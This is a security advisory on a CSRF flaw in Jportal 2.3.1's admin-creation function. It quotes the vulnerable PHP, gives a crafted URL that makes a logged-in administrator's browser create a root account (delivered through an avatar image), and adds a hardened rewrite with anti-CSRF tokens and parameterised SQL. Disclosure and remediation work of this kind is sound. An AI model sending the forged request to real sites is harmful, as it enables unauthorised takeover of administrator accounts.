
From: dzitu_(at)_poczta.fm <dzitu_(at)_poczta.fm>
Date: 13 February 2007
Subject: Jportal 2.3.1 CSRF vulnerability

Type: CSRF Attack / Input Validation Error
Remote: Yes
Version: 2.3.1 (older versions are very likely vulnerable too)
Problem is in admin/admin.adm.php (the function is reproduced up to the exit; the closing braces are added here so the snippet reads as complete code):

    function add_admin() {

        // register_globals: all of these are plain globals populated from the request
        global $name, $mail, $nick_, $action, $user_tbl, $access;
        global $nick, $PHP_SELF, $_pass, $pass_, $acce, $op, $goto;

        if($access=='root') {

            // password and its confirmation must match
            if($_pass==$pass_) {

                // unset module flags default to 'n' (no access)
                if($acce[news]=='') $acce[news]='n';
                if($acce[info]=='') $acce[info]='n';
                if($acce[art]=='') $acce[art]='n';
                if($acce[sonda]=='') $acce[sonda]='n';
                if($acce[link]=='') $acce[link]='n';
                if($acce[forum]=='') $acce[forum]='n';
                if($acce[comm]=='') $acce[comm]='n';
                if($acce[menu]=='') $acce[menu]='n';
                if($acce[bann]=='') $acce[bann]='n';
                if($acce[topic]=='') $acce[topic]='n';
                if($acce[file]=='') $acce[file]='n';

                if($acce[root]<>'t') {
                    $acce_ = $acce[news].'-'.$acce[art].'-'.$acce[info].'-'.
                             $acce[sonda].'-'.$acce[link].'-'.$acce[forum].'-'.
                             $acce[comm].'-'.$acce[file].'-'.$acce[menu].'-'.
                             $acce[bann].'-'.$acce[topic];
                } else {
                    // acce[root]=t makes the new account a root administrator
                    $acce_ = 'root';
                }

                // no anti-CSRF token, no origin check; request values go straight into the SQL
                $query = "INSERT INTO $user_tbl VALUES(NULL, '$nick_', '".md5($_pass)."', '$name', now(), '$acce_', '$mail', 1)";
                $result = mysql_query($query);

                add_log('dodano administratora (ID '.mysql_insert_id().')');

                // $goto is request-controlled as well
                if($goto=='')
                    header("Location: admin.php?op=$op");
                else
                    header("Location: $goto");
                exit;
            }
        }
    }
As the code shows, every variable the function uses arrives through register_globals, i.e. from "nowhere" in particular (it can be POST, GET or even COOKIE data; `acce%5Broot%5D=t` in a query string is enough to populate `$acce['root']`), and nothing checks that the request was actually submitted by the administrator through the admin panel: there is no anti-CSRF token and no check on where the request originated. Consequently, as long as an administrator is logged in and has not logged out, getting their browser to send a prepared request (for example by setting the request URL as the image source of our profile avatar, which the admin's browser fetches when it renders a page showing it) creates a root account for us.

http://vulnerable_jportal/admin.php?op=admin&name=admin&mail=&nick_=admin&_pass=pass&pass_=haslo&acce%5Broot%5D=t&ok=dodaj&goto=&cmd=add

gives us a root account with the name "admin" and password "pass". Note that add_admin() only runs the INSERT when $_pass and $pass_ are equal (the password-confirmation check), so in a working request both parameters must carry the same value; the URL above as printed sends pass_=haslo.
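As an added example, not Jportal's own code and not part of the original advisory, the following is how add_admin() could be rewritten so that the request above no longer works: a state-changing action accepts only POST, authorisation comes from the session rather than a request variable, the form must carry a per-session anti-CSRF token, and the INSERT is parameterised. It assumes a mysqli connection $db, that the admin login stores the level in $_SESSION['access'], that the admin form embeds csrf_token() as a hidden field named "csrf_token", and that add_log() is the existing Jportal helper seen in the original; the column order of $user_tbl is taken from the original INSERT. Replacing md5() with password_hash() and restricting $goto to a local path go beyond the CSRF issue the advisory reports.

```php
<?php
// Added example (not Jportal code): hardened replacement for add_admin()
// from admin/admin.adm.php. Assumptions: $db is a mysqli connection,
// $_SESSION['access'] holds the logged-in admin's level, the admin form
// submits a hidden "csrf_token" field, and add_log() exists as in Jportal.

session_start();

// Issue a per-session anti-CSRF token; the page that renders the form embeds it.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_check($submitted): bool {
    return isset($_SESSION['csrf_token'])
        && is_string($submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

// Collapse the per-module flags into the dash-joined string the original stores,
// in the original's column order; anything other than 't' becomes 'n'.
function build_access(array $acce): string {
    if (($acce['root'] ?? '') === 't') {
        return 'root';
    }
    $order = ['news', 'art', 'info', 'sonda', 'link', 'forum', 'comm', 'file', 'menu', 'bann', 'topic'];
    $flags = [];
    foreach ($order as $k) {
        $flags[] = (($acce[$k] ?? '') === 't') ? 't' : 'n';
    }
    return implode('-', $flags);
}

function add_admin(mysqli $db, string $user_tbl): void {
    // 1. State-changing action: accept POST only, never GET or cookie-sourced globals.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit;
    }
    // 2. Authorisation is read from the session, not from a request parameter.
    if (($_SESSION['access'] ?? '') !== 'root') {
        http_response_code(403);
        exit;
    }
    // 3. Anti-CSRF: the request must carry the token only the admin's own form knows.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit;
    }

    $nick  = $_POST['nick_'] ?? '';
    $name  = $_POST['name']  ?? '';
    $mail  = $_POST['mail']  ?? '';
    $pass  = $_POST['_pass'] ?? '';
    $pass2 = $_POST['pass_'] ?? '';
    if ($nick === '' || $pass === '' || $pass !== $pass2) {
        http_response_code(400);
        exit;
    }
    $acce  = $_POST['acce'] ?? [];
    $acce_ = build_access(is_array($acce) ? $acce : []);

    // 4. Parameterised INSERT instead of string-built SQL; $user_tbl is a config
    //    constant (as in the original), not request data, so it is safe to interpolate.
    $hash = password_hash($pass, PASSWORD_DEFAULT);
    $stmt = $db->prepare("INSERT INTO `$user_tbl` VALUES (NULL, ?, ?, ?, NOW(), ?, ?, 1)");
    $stmt->bind_param('sssss', $nick, $hash, $name, $acce_, $mail);
    $stmt->execute();
    $id = $db->insert_id;
    $stmt->close();
    add_log("dodano administratora (ID $id)");

    // 5. Redirect only to a local path; the original honoured any request-supplied $goto.
    $goto = $_POST['goto'] ?? '';
    if ($goto === '' || $goto[0] !== '/' || substr($goto, 0, 2) === '//') {
        $op   = $_POST['op'] ?? 'admin';
        $goto = 'admin.php?op=' . rawurlencode($op);
    }
    header('Location: ' . $goto);
    exit;
}
```

With this in place the avatar trick fails twice over: the image fetch is a GET, and even a forged POST from another origin cannot supply the session-bound csrf_token value. Keeping the authorisation check on $_SESSION['access'] also closes the register_globals path to $access entirely.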

Dżitu
dzitu@poczta.fm

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod